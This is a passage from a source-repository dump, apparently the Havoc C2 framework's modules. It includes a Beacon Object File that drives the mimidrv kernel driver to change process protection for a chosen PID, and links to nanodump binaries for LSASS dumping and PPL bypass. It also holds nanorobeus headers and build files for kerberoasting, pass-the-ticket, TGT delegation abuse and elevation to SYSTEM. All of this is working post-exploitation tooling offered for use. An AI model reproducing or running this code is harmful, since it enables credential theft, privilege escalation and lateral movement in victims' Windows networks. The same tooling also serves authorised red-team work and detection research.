                lStatus = ERROR_SUCCESS;
            }
            else
            {
                lStatus = GetLastError();
                if(lStatus == ERROR_MORE_DATA)
                {
                    /* Too small: release this attempt; the loop increment doubles the size for the next one. */
                    LocalFree(*pBufferOut);
                }
            }
        }
    }
    if(!status)
    {
        BeaconPrintf(CALLBACK_ERROR, "DeviceIoControl");
        if(autobuffer)
        {
            /* Frees the buffer of the failed attempt; *pBufferOut is NULL here only if LocalAlloc itself failed. */
            LocalFree(*pBufferOut);
        }
    }
    else if(pSzBufferOut)
    {
        *pSzBufferOut = returned;
    }
    return status;
}

/*
 * Open the device named by `driver` (read+write, no sharing, OPEN_EXISTING)
 * and forward the request to kull_m_kernel_ioctl_handle; the handle is
 * closed before returning. An open failure is reported as "CreateFile".
 * The NULL test is redundant with the INVALID_HANDLE_VALUE test but harmless.
 */
BOOL kull_m_kernel_ioctl(PCWSTR driver, DWORD ioctlCode, PVOID bufferIn, DWORD szBufferIn, PVOID * pBufferOut, PDWORD pSzBufferOut, BOOL autobuffer)
{
    BOOL status = FALSE;
    HANDLE hDriver;
    hDriver = CreateFileW(driver, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if(hDriver && hDriver != INVALID_HANDLE_VALUE)
    {
        status = kull_m_kernel_ioctl_handle(hDriver, ioctlCode, bufferIn, szBufferIn, pBufferOut, pSzBufferOut, autobuffer);
        CloseHandle(hDriver);
    }
    else
    {
        BeaconPrintf(CALLBACK_ERROR, "CreateFile");
    }
    return status;
}

/*
 * Send ioctlCode to \\.\mimidrv with an auto-sized output buffer. Whatever
 * the driver returns is discarded (the print loop is commented out); only
 * the success flag reaches the caller.
 */
BOOL kull_m_kernel_mimidrv_simple_output(DWORD ioctlCode, PVOID bufferIn, DWORD szBufferIn)
{
    BOOL status = FALSE;
    PVOID buffer = NULL;
    DWORD szBuffer;   /* written by the autobuffer path before it is ever read */

    status = kull_m_kernel_ioctl(L"\\\\.\\" MIMIKATZ_DRIVER, ioctlCode, bufferIn, szBufferIn, &buffer, &szBuffer, TRUE);
    if(status)
    {
        //for(i = 0; i < szBuffer / sizeof(wchar_t); i++)
        //    kprintf(L"%c", ((wchar_t *) buffer)[i]);
        LocalFree(buffer);
    }
    return status;
}

/*
 * BOF entry point. args carries one int (the target PID, packed as uint32
 * by mimidrv.py); every other field of the request, including the
 * PS_PROTECTION bits, stays zero. The driver's answer is reported only as
 * the boolean "Result: %d".
 */
void go(char* args, int length)
{
    datap parser;
    MIMIDRV_PROCESS_PROTECT_INFORMATION protectInfos = {0, {0, 0, {0, 0, 0}}};
    BOOL ret_val = FALSE;
    BeaconDataParse(&parser, args, length);
    protectInfos.processId = BeaconDataInt(&parser); // PID supplied by the operator; nothing here checks that it is LSASS

    ret_val = kull_m_kernel_mimidrv_simple_output(IOCTL_MIMIDRV_PROCESS_PROTECT, &protectInfos, sizeof(MIMIDRV_PROCESS_PROTECT_INFORMATION));
    BeaconPrintf(CALLBACK_OUTPUT, "Result: %d", ret_val);

    return;
}
-------------------------------------------------------------------------------- /nanodump/bin/nanodump.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/nanodump/bin/nanodump.x64.o -------------------------------------------------------------------------------- /nanodump/bin/nanodump.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/nanodump/bin/nanodump.x86.o -------------------------------------------------------------------------------- /nanodump/bin/nanodump_ppl_dump.x64.dll: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/nanodump/bin/nanodump_ppl_dump.x64.dll -------------------------------------------------------------------------------- /nanodump/bin/nanodump_ppl_dump.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/nanodump/bin/nanodump_ppl_dump.x64.o -------------------------------------------------------------------------------- /nanodump/bin/nanodump_ppl_medic.x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/nanodump/bin/nanodump_ppl_medic.x64.dll -------------------------------------------------------------------------------- /nanodump/bin/nanodump_ppl_medic.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/nanodump/bin/nanodump_ppl_medic.x64.o -------------------------------------------------------------------------------- /nanodump/bin/nanodump_ssp.x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/nanodump/bin/nanodump_ssp.x64.dll -------------------------------------------------------------------------------- /nanodump/bin/nanodump_ssp.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/nanodump/bin/nanodump_ssp.x64.o -------------------------------------------------------------------------------- /nanodump/makefile: -------------------------------------------------------------------------------- 1 | NAME 
= nanodump 2 | BIN = bin 3 | 4 | all: 5 | @ make -C $(NAME) -f Makefile.mingw 6 | @ find $(NAME)/dist -name '*.o' -exec cp {} $(BIN)/ \; 7 | 8 | clean: 9 | rm $(BIN)/*.o 10 | -------------------------------------------------------------------------------- /nanorobeus/bin/nanorobeus.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/nanorobeus/bin/nanorobeus.x64.o -------------------------------------------------------------------------------- /nanorobeus/bin/nanorobeus.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/nanorobeus/bin/nanorobeus.x86.o -------------------------------------------------------------------------------- /nanorobeus/include/base64.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2003 Apple Computer, Inc. All rights reserved. 3 | * 4 | * @APPLE_LICENSE_HEADER_START@ 5 | * 6 | * Copyright (c) 1999-2003 Apple Computer, Inc. All Rights Reserved. 7 | * 8 | * This file contains Original Code and/or Modifications of Original Code 9 | * as defined in and that are subject to the Apple Public Source License 10 | * Version 2.0 (the 'License'). You may not use this file except in 11 | * compliance with the License. Please obtain a copy of the License at 12 | * http://www.opensource.apple.com/apsl/ and read it before using this 13 | * file. 14 | * 15 | * The Original Code and all software distributed under the License are 16 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 17 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 18 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 19 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 
20 | * Please see the License for the specific language governing rights and 21 | * limitations under the License. 22 | * 23 | * @APPLE_LICENSE_HEADER_END@ 24 | */ 25 | /* ==================================================================== 26 | * Copyright (c) 1995-1999 The Apache Group. All rights reserved. 27 | * 28 | * Redistribution and use in source and binary forms, with or without 29 | * modification, are permitted provided that the following conditions 30 | * are met: 31 | * 32 | * 1. Redistributions of source code must retain the above copyright 33 | * notice, this list of conditions and the following disclaimer. 34 | * 35 | * 2. Redistributions in binary form must reproduce the above copyright 36 | * notice, this list of conditions and the following disclaimer in 37 | * the documentation and/or other materials provided with the 38 | * distribution. 39 | * 40 | * 3. All advertising materials mentioning features or use of this 41 | * software must display the following acknowledgment: 42 | * "This product includes software developed by the Apache Group 43 | * for use in the Apache HTTP server project (http://www.apache.org/)." 44 | * 45 | * 4. The names "Apache Server" and "Apache Group" must not be used to 46 | * endorse or promote products derived from this software without 47 | * prior written permission. For written permission, please contact 48 | * apache@apache.org. 49 | * 50 | * 5. Products derived from this software may not be called "Apache" 51 | * nor may "Apache" appear in their names without prior written 52 | * permission of the Apache Group. 53 | * 54 | * 6. Redistributions of any form whatsoever must retain the following 55 | * acknowledgment: 56 | * "This product includes software developed by the Apache Group 57 | * for use in the Apache HTTP server project (http://www.apache.org/)." 
58 | * 59 | * THIS SOFTWARE IS PROVIDED BY THE APACHE GROUP ``AS IS'' AND ANY 60 | * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 61 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 62 | * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE APACHE GROUP OR 63 | * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, 64 | * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT 65 | * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 66 | * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 67 | * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, 68 | * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) 69 | * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED 70 | * OF THE POSSIBILITY OF SUCH DAMAGE. 71 | * ==================================================================== 72 | * 73 | * This software consists of voluntary contributions made by many 74 | * individuals on behalf of the Apache Group and was originally based 75 | * on public domain software written at the National Center for 76 | * Supercomputing Applications, University of Illinois, Urbana-Champaign. 77 | * For more information on the Apache Group and the Apache HTTP server 78 | * project, please see . 
79 | * 80 | */ 81 | 82 | #pragma once 83 | 84 | int Base64encode_len(int len); 85 | int Base64encode(char* coded_dst, const char* plain_src, int len_plain_src); 86 | 87 | int Base64decode_len(const char* coded_src); 88 | int Base64decode(char* plain_dst, const char* coded_src); 89 | -------------------------------------------------------------------------------- /nanorobeus/include/beacon.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | /* data API */ 3 | #include 4 | #ifdef BOF 5 | typedef struct { 6 | char *original; /* the original buffer [so we can free it] */ 7 | char *buffer; /* current pointer into our buffer */ 8 | int length; /* remaining length of data */ 9 | int size; /* total size of this buffer */ 10 | } datap; 11 | 12 | DECLSPEC_IMPORT void BeaconDataParse(datap *parser, char *buffer, int size); 13 | DECLSPEC_IMPORT int BeaconDataInt(datap *parser); 14 | DECLSPEC_IMPORT short BeaconDataShort(datap *parser); 15 | DECLSPEC_IMPORT int BeaconDataLength(datap *parser); 16 | DECLSPEC_IMPORT char *BeaconDataExtract(datap *parser, int *size); 17 | 18 | /* format API */ 19 | typedef struct { 20 | char *original; /* the original buffer [so we can free it] */ 21 | char *buffer; /* current pointer into our buffer */ 22 | int length; /* remaining length of data */ 23 | int size; /* total size of this buffer */ 24 | } formatp; 25 | 26 | DECLSPEC_IMPORT void BeaconFormatAlloc(formatp *format, int maxsz); 27 | DECLSPEC_IMPORT void BeaconFormatReset(formatp *format); 28 | DECLSPEC_IMPORT void BeaconFormatFree(formatp *format); 29 | DECLSPEC_IMPORT void BeaconFormatAppend(formatp *format, char *text, int len); 30 | DECLSPEC_IMPORT void BeaconFormatPrintf(formatp *format, char *fmt, ...); 31 | DECLSPEC_IMPORT char *BeaconFormatToString(formatp *format, int *size); 32 | DECLSPEC_IMPORT void BeaconFormatInt(formatp *format, int value); 33 | 34 | /* Output Functions */ 35 | #define CALLBACK_OUTPUT 0x0 36 | #define 
CALLBACK_OUTPUT_OEM 0x1e 37 | #define CALLBACK_ERROR 0x0d 38 | #define CALLBACK_OUTPUT_UTF8 0x20 39 | 40 | DECLSPEC_IMPORT void BeaconPrintf(int type, char *fmt, ...); 41 | DECLSPEC_IMPORT void BeaconOutput(int type, char *data, int len); 42 | 43 | /* Token Functions */ 44 | DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); 45 | DECLSPEC_IMPORT void BeaconRevertToken(); 46 | DECLSPEC_IMPORT BOOL BeaconIsAdmin(); 47 | 48 | /* Spawn+Inject Functions */ 49 | DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char *buffer, int length); 50 | DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char *payload, int p_len, int p_offset, char *arg, 51 | int a_len); 52 | DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION *pInfo, char *payload, int p_len, int p_offset, 53 | char *arg, int a_len); 54 | DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION *pInfo); 55 | 56 | /* Utility Functions */ 57 | DECLSPEC_IMPORT BOOL toWideChar(char *src, wchar_t *dst, int max); 58 | 59 | #define PRINT(dispatch, ...) \ 60 | { BeaconPrintf(CALLBACK_OUTPUT, __VA_ARGS__); } 61 | #elif BRC4 62 | DECLSPEC_IMPORT int BadgerDispatch(WCHAR **dispatch, const char *__format, ...); 63 | DECLSPEC_IMPORT int BadgerDispatchW(WCHAR **dispatch, const WCHAR *__format, ...); 64 | DECLSPEC_IMPORT size_t BadgerStrlen(CHAR *buf); 65 | DECLSPEC_IMPORT size_t BadgerWcslen(WCHAR *buf); 66 | 67 | DECLSPEC_IMPORT void *BadgerMemcpy(void *dest, const void *src, size_t len); 68 | DECLSPEC_IMPORT void *BadgerMemset(void *dest, int val, size_t len); 69 | 70 | DECLSPEC_IMPORT int BadgerStrcmp(const char *p1, const char *p2); 71 | DECLSPEC_IMPORT int BadgerWcscmp(const wchar_t *s1, const wchar_t *s2); 72 | DECLSPEC_IMPORT int BadgerAtoi(char *string); 73 | 74 | #define PRINT(dispatch, ...) \ 75 | { BadgerDispatch(dispatch, __VA_ARGS__); } 76 | #else 77 | 78 | #define PRINT(dispatch, ...) 
\
    { fprintf(stdout, __VA_ARGS__); }

#endif
-------------------------------------------------------------------------------- /nanorobeus/include/common.h: --------------------------------------------------------------------------------
/* common.h - declarations shared by the nanorobeus BOF sources. */
#pragma once

#include 
#include 
#include 
#include 
#include "beacon.h"
#include "bofdefs.h"

#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
#define STATUS_MEMORY_NOT_ALLOCATED ((NTSTATUS)0xC00000A0L)
/*
 * NOTE(review): stricter than the SDK macro, which treats every non-negative
 * NTSTATUS (informational and warning codes) as success; this version accepts
 * only STATUS_SUCCESS, so such codes are handled as failures wherever it is used.
 */
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) == 0)

/* An array of logon-session records together with its element count. */
typedef struct _LOGON_SESSION_DATA {
    PSECURITY_LOGON_SESSION_DATA* sessionData;
    ULONG sessionCount;
/* NOTE(review): there is no '*' before PLOGON_SESSION_DATA, so it names the struct itself, not a pointer to it. */
} LOGON_SESSION_DATA, PLOGON_SESSION_DATA;

/*
 * Kerberos encryption-type numbers as used in ticket and key structures
 * (the IANA etype registry from RFC 3961 / RFC 4757). The negative value
 * appears to follow Microsoft's private numbering in ntsecapi.h — confirm.
 */
enum KERB_ETYPE {
    DES_CBC_CRC = 1,
    DES_CBC_MD4 = 2,
    DES_CBC_MD5 = 3,
    DES3_CBC_MD5 = 5,
    DES3_CBC_SHA1 = 7,
    DSAWITHSHA1_CMSOID = 9,
    MD5WITHRSAENCRYPTION_CMSOID = 10,
    SHA1WITHRSAENCRYPTION_CMSOID = 11,
    RC2CBC_ENVOID = 12,
    RSAENCRYPTION_ENVOID = 13,
    RSAES_OAEP_ENV_OID = 14,
    DES3_CBC_SHA1_KD = 16,
    AES128_CTS_HMAC_SHA1 = 17,   /* aes128-cts-hmac-sha1-96 */
    AES256_CTS_HMAC_SHA1 = 18,   /* aes256-cts-hmac-sha1-96 */
    RC4_HMAC = 23,               /* rc4-hmac */
    RC4_HMAC_EXP = 24,
    SUBKEY_KEYMATERIAL = 65,
    OLD_EXP = -135
};

/* Token, process and string helpers; only the prototypes are visible here, the bodies live elsewhere in the module. */
HANDLE GetCurrentToken(DWORD DesiredAccess);
char* GetEncryptionTypeString(LONG encType);
SYSTEMTIME ConvertToSystemtime(LARGE_INTEGER li);
BOOL IsHighIntegrity(HANDLE TokenHandle);
BOOL IsSystem(HANDLE TokenHandle);
NTSTATUS GetLsaHandle(HANDLE hProcessToken, BOOL highIntegrity, HANDLE* hLsa);
int GetProcessIdByName(WCHAR* processName);
BOOL ElevateToSystem();
char* GetNarrowString(WCHAR* src);
char* GetNarrowStringFromUnicode(UNICODE_STRING src);
WCHAR* GetWideString(char* src);
-------------------------------------------------------------------------------- /nanorobeus/include/kerberoast.h: --------------------------------------------------------------------------------
| #pragma once 2 | 3 | #include 4 | 5 | void execute_kerberoast(WCHAR** dispatch, char* spn); -------------------------------------------------------------------------------- /nanorobeus/include/klist.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include "base64.h" 6 | #include "common.h" 7 | #include "sessions.h" 8 | 9 | void execute_klist(WCHAR** dispatch, HANDLE hToken, LUID luid, BOOL currentLuid, BOOL dump); 10 | void EnumerateTickets(LUID*, BOOL, HANDLE); 11 | NTSTATUS ExtractTicket(HANDLE hLsa, ULONG authPackage, LUID luid, UNICODE_STRING targetName, PUCHAR* ticket, 12 | PULONG ticketSize); 13 | void PrintTicketInfo(WCHAR** dispatch, KERB_TICKET_CACHE_INFO_EX cacheInfo); 14 | void PrintTicketFlags(WCHAR** dispatch, ULONG ticketFlags); 15 | -------------------------------------------------------------------------------- /nanorobeus/include/krb5.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "msasn1.h" 4 | 5 | // Copyright (c) Microsoft Corporation 6 | 7 | #define KRB_KEY_USAGE_AP_REQ_AUTHENTICATOR 11 8 | #define KRB_KEY_USAGE_KRB_CRED_ENCRYPTED_PART 14 9 | 10 | #define version_present 0x80 11 | #define ticket_extensions_present 0x80 12 | #define checksum_present 0x80 13 | #define KERB_AUTHENTICATOR_subkey_present 0x40 14 | #define KERB_AUTHENTICATOR_sequence_number_present 0x20 15 | #define KERB_AUTHENTICATOR_authorization_data_present 0x10 16 | #define subject_public_key_present 0x80 17 | 18 | #define KERB_ENCRYPTED_DATA_PDU 6 19 | #define KERB_ENCRYPTION_KEY_PDU 7 20 | #define KERB_CHECKSUM_PDU 8 21 | #define KERB_REPLY_KEY_PACKAGE2_PDU 15 22 | #define KERB_TICKET_PDU 28 23 | #define KERB_AUTHENTICATOR_PDU 30 24 | #define KERB_AP_REQUEST_PDU 31 25 | #define KERB_CRED_PDU 36 26 | 27 | #define SIZE_KRB5_Module_PDU_6 sizeof(KERB_ENCRYPTED_DATA) 28 | #define SIZE_KRB5_Module_PDU_7 
sizeof(KERB_ENCRYPTION_KEY) 29 | #define SIZE_KRB5_Module_PDU_8 sizeof(KERB_CHECKSUM) 30 | #define SIZE_KRB5_Module_PDU_15 sizeof(KERB_REPLY_KEY_PACKAGE2) 31 | #define SIZE_KRB5_Module_PDU_28 sizeof(KERB_TICKET) 32 | #define SIZE_KRB5_Module_PDU_30 sizeof(KERB_AUTHENTICATOR) 33 | #define SIZE_KRB5_Module_PDU_31 sizeof(KERB_AP_REQUEST) 34 | #define SIZE_KRB5_Module_PDU_36 sizeof(KERB_CRED) 35 | 36 | typedef LONG KERBERR, *PKERBERR; 37 | #define KDC_ERR_NONE ((KERBERR)0x0) 38 | #define KRB_ERR_GENERIC ((KERBERR)0x3C) 39 | #define KDC_ERR_MORE_DATA ((KERBERR)0x80000001) 40 | #define KERB_SUCCESS(_kerberr_) ((KERBERR)(_kerberr_) == KDC_ERR_NONE) 41 | 42 | typedef struct _KERB_GSS_CHECKSUM { 43 | ULONG BindLength; 44 | ULONG BindHash[4]; 45 | ULONG GssFlags; 46 | USHORT Delegation; 47 | USHORT DelegationLength; 48 | UCHAR DelegationInfo[ANYSIZE_ARRAY]; 49 | } KERB_GSS_CHECKSUM, *PKERB_GSS_CHECKSUM; 50 | 51 | typedef ASN1ztcharstring_t KERB_PRINCIPAL_NAME_name_string_Seq; 52 | typedef struct KERB_PRINCIPAL_NAME_name_string_s* PKERB_PRINCIPAL_NAME_name_string; 53 | typedef struct KERB_PRINCIPAL_NAME_name_string_s { 54 | PKERB_PRINCIPAL_NAME_name_string next; 55 | KERB_PRINCIPAL_NAME_name_string_Seq value; 56 | } KERB_PRINCIPAL_NAME_name_string_Element, *KERB_PRINCIPAL_NAME_name_string; 57 | 58 | typedef struct PKERB_TICKET_EXTENSIONS_s* PPKERB_TICKET_EXTENSIONS; 59 | typedef struct PKERB_TICKET_EXTENSIONS_Seq { 60 | ASN1int32_t te_type; 61 | ASN1octetstring_t te_data; 62 | } PKERB_TICKET_EXTENSIONS_Seq; 63 | typedef struct PKERB_TICKET_EXTENSIONS_s { 64 | PPKERB_TICKET_EXTENSIONS next; 65 | PKERB_TICKET_EXTENSIONS_Seq value; 66 | } PKERB_TICKET_EXTENSIONS_Element, *PKERB_TICKET_EXTENSIONS; 67 | 68 | typedef ASN1bitstring_t KERB_AP_OPTIONS; 69 | typedef ASN1ztcharstring_t KERB_REALM; 70 | typedef ASN1generalizedtime_t KERB_TIME; 71 | typedef ASN1intx_t KERB_SEQUENCE_NUMBER_LARGE; 72 | 73 | typedef struct PKERB_AUTHORIZATION_DATA_Seq { 74 | ASN1int32_t auth_data_type; 75 | 
ASN1octetstring_t auth_data; 76 | } PKERB_AUTHORIZATION_DATA_Seq; 77 | 78 | typedef struct PKERB_AUTHORIZATION_DATA_s* PPKERB_AUTHORIZATION_DATA; 79 | typedef struct PKERB_AUTHORIZATION_DATA_s { 80 | PPKERB_AUTHORIZATION_DATA next; 81 | PKERB_AUTHORIZATION_DATA_Seq value; 82 | } PKERB_AUTHORIZATION_DATA_Element, *PKERB_AUTHORIZATION_DATA; 83 | 84 | typedef struct KERB_PRINCIPAL_NAME { 85 | ASN1int32_t name_type; 86 | PKERB_PRINCIPAL_NAME_name_string name_string; 87 | } KERB_PRINCIPAL_NAME; 88 | 89 | typedef struct KERB_ENCRYPTED_DATA { 90 | union { 91 | ASN1uint16_t bit_mask; 92 | ASN1octet_t o[1]; 93 | }; 94 | ASN1int32_t encryption_type; 95 | ASN1int32_t version; 96 | ASN1octetstring_t cipher_text; 97 | } KERB_ENCRYPTED_DATA; 98 | 99 | typedef struct KERB_ENCRYPTION_KEY { 100 | ASN1int32_t keytype; 101 | ASN1octetstring_t keyvalue; 102 | } KERB_ENCRYPTION_KEY; 103 | 104 | typedef struct KERB_CHECKSUM { 105 | ASN1int32_t checksum_type; 106 | ASN1octetstring_t checksum; 107 | } KERB_CHECKSUM; 108 | 109 | typedef struct KERB_REPLY_KEY_PACKAGE2 { 110 | union { 111 | ASN1uint16_t bit_mask; 112 | ASN1octet_t o[1]; 113 | }; 114 | KERB_ENCRYPTION_KEY reply_key; 115 | ASN1int32_t nonce; 116 | ASN1bitstring_t subject_public_key; 117 | } KERB_REPLY_KEY_PACKAGE2; 118 | 119 | typedef struct KERB_TICKET { 120 | union { 121 | ASN1uint16_t bit_mask; 122 | ASN1octet_t o[1]; 123 | }; 124 | ASN1int32_t ticket_version; 125 | KERB_REALM realm; 126 | KERB_PRINCIPAL_NAME server_name; 127 | KERB_ENCRYPTED_DATA encrypted_part; 128 | PPKERB_TICKET_EXTENSIONS ticket_extensions; 129 | } KERB_TICKET; 130 | 131 | typedef struct KERB_AUTHENTICATOR { 132 | union { 133 | ASN1uint16_t bit_mask; 134 | ASN1octet_t o[1]; 135 | }; 136 | ASN1int32_t authenticator_version; 137 | KERB_REALM client_realm; 138 | KERB_PRINCIPAL_NAME client_name; 139 | KERB_CHECKSUM checksum; 140 | ASN1int32_t client_usec; 141 | KERB_TIME client_time; 142 | KERB_ENCRYPTION_KEY subkey; 143 | KERB_SEQUENCE_NUMBER_LARGE 
sequence_number; 144 | PPKERB_AUTHORIZATION_DATA authorization_data; 145 | } KERB_AUTHENTICATOR; 146 | 147 | typedef struct KERB_AP_REQUEST { 148 | ASN1int32_t version; 149 | ASN1int32_t message_type; 150 | KERB_AP_OPTIONS ap_options; 151 | KERB_TICKET ticket; 152 | KERB_ENCRYPTED_DATA authenticator; 153 | } KERB_AP_REQUEST, *PKERB_AP_REQUEST; 154 | 155 | typedef struct KERB_CRED_tickets_s* PKERB_CRED_tickets; 156 | typedef struct KERB_CRED_tickets_s { 157 | PKERB_CRED_tickets next; 158 | KERB_TICKET value; 159 | } KERB_CRED_tickets_Element, *KERB_CRED_tickets; 160 | typedef struct KERB_CRED { 161 | ASN1int32_t version; 162 | ASN1int32_t message_type; 163 | PKERB_CRED_tickets tickets; 164 | KERB_ENCRYPTED_DATA encrypted_part; 165 | } KERB_CRED; 166 | 167 | ASN1module_t ASN1CALL KRB5_Module_Startup(void); 168 | void ASN1CALL KRB5_Module_Cleanup(ASN1module_t module); 169 | KERBERR KerbInitAsn(ASN1module_t module, ASN1encoding_t* pEnc, ASN1decoding_t* pDec); 170 | void KerbTermAsn(ASN1encoding_t pEnc, ASN1decoding_t pDec); 171 | KERBERR NTAPI KerbUnpackData(ASN1module_t module, PUCHAR Data, ULONG DataSize, ULONG PduValue, PVOID* DecodedData); 172 | KERBERR NTAPI KerbPackData(ASN1module_t module, PVOID Data, ULONG PduValue, PULONG DataSize, PUCHAR* EncodedData); 173 | void KerbFreeData(ASN1module_t module, ULONG PduValue, PVOID Data); -------------------------------------------------------------------------------- /nanorobeus/include/luid.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include "common.h" 5 | 6 | void execute_luid(WCHAR** dispatch, HANDLE hToken); 7 | LUID* GetCurrentLUID(HANDLE TokenHandle); 8 | -------------------------------------------------------------------------------- /nanorobeus/include/ptt.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include "common.h" 5 | #include "base64.h" 6 | 7 | #define 
_KerbSubmitTicketMessage 21 8 | 9 | typedef struct _KERB_CRYPTO_KEY32 10 | { 11 | int KeyType; 12 | int Length; 13 | int Offset; 14 | } KERB_CRYPTO_KEY32, *PKERB_CRYPTO_KEY32; 15 | 16 | typedef struct _KERB_SUBMIT_TKT_REQUEST 17 | { 18 | KERB_PROTOCOL_MESSAGE_TYPE MessageType; 19 | LUID LogonId; 20 | int Flags; 21 | KERB_CRYPTO_KEY32 Key; // key to decrypt KERB_CRED 22 | int KerbCredSize; 23 | int KerbCredOffset; 24 | } KERB_SUBMIT_TKT_REQUEST, *PKERB_SUBMIT_TKT_REQUEST; 25 | 26 | void execute_ptt(WCHAR** dispatch, HANDLE hToken, char* ticket, LUID luid, BOOL currentLuid); -------------------------------------------------------------------------------- /nanorobeus/include/purge.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include "common.h" 6 | 7 | void execute_purge(WCHAR** dispatch, HANDLE hToken, LUID luid, BOOL currentLuid); 8 | -------------------------------------------------------------------------------- /nanorobeus/include/sessions.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include "bofdefs.h" 5 | #include "common.h" 6 | #include "luid.h" 7 | 8 | void execute_sessions(WCHAR** dispatch, HANDLE hToken, LUID luid, BOOL currentLuid); 9 | NTSTATUS GetLogonSessionData(LUID luid, LOGON_SESSION_DATA* data); 10 | char* GetLogonTypeString(ULONG uLogonType); 11 | void PrintLogonSessionData(WCHAR** dispatch, SECURITY_LOGON_SESSION_DATA data); -------------------------------------------------------------------------------- /nanorobeus/include/tgtdeleg.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include "bofdefs.h" 6 | #include "common.h" 7 | #include "base64.h" 8 | #include "msasn1.h" 9 | #include "krb5.h" 10 | 11 | void execute_tgtdeleg(WCHAR** dispatch, HANDLE hToken, char* spn); 12 | PBYTE SearchOID(LPCVOID 
data, SIZE_T size); 13 | PVOID MemorySearch(LPCVOID pattern, SIZE_T pSize, LPCVOID buf, SIZE_T bSize); 14 | NTSTATUS KerberosDecrypt(DWORD keyUsage, KERB_ENCRYPTION_KEY* key, ASN1octetstring_t* in, ASN1octetstring_t* out); 15 | NTSTATUS GetKeyFromCache(HANDLE hToken, char* target, LONG encType, PUCHAR* key, PULONG keySize); 16 | LONG RequestApReq(char *spn, PUCHAR* apreq, PULONG apreqSize, BOOL checkDelegate); -------------------------------------------------------------------------------- /nanorobeus/makefile: -------------------------------------------------------------------------------- 1 | BOFNAME := nanorobeus 2 | CC_x64 := x86_64-w64-mingw32-gcc 3 | CC_x86 := i686-w64-mingw32-gcc 4 | STRIP := strip 5 | OPTIONS := -O3 -masm=intel -Wall -Wextra -g -I include -fno-reorder-functions 6 | 7 | .PHONY: all 8 | 9 | all: bof_64 bof_86 10 | 11 | bof_64: 12 | $(CC_x64) -c src/entry.c -o bin/$(BOFNAME).x64.o -DBOF $(OPTIONS) 13 | $(STRIP) --strip-unneeded bin/$(BOFNAME).x64.o 14 | 15 | bof_86: 16 | $(CC_x86) -c src/entry.c -o bin/$(BOFNAME).x86.o -DBOF $(OPTIONS) 17 | $(STRIP) --strip-unneeded bin/$(BOFNAME).x86.o 18 | -------------------------------------------------------------------------------- /nanorobeus/src/base64.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2003 Apple Computer, Inc. All rights reserved. 3 | * 4 | * @APPLE_LICENSE_HEADER_START@ 5 | * 6 | * Copyright (c) 1999-2003 Apple Computer, Inc. All Rights Reserved. 7 | * 8 | * This file contains Original Code and/or Modifications of Original Code 9 | * as defined in and that are subject to the Apple Public Source License 10 | * Version 2.0 (the 'License'). You may not use this file except in 11 | * compliance with the License. Please obtain a copy of the License at 12 | * http://www.opensource.apple.com/apsl/ and read it before using this 13 | * file. 
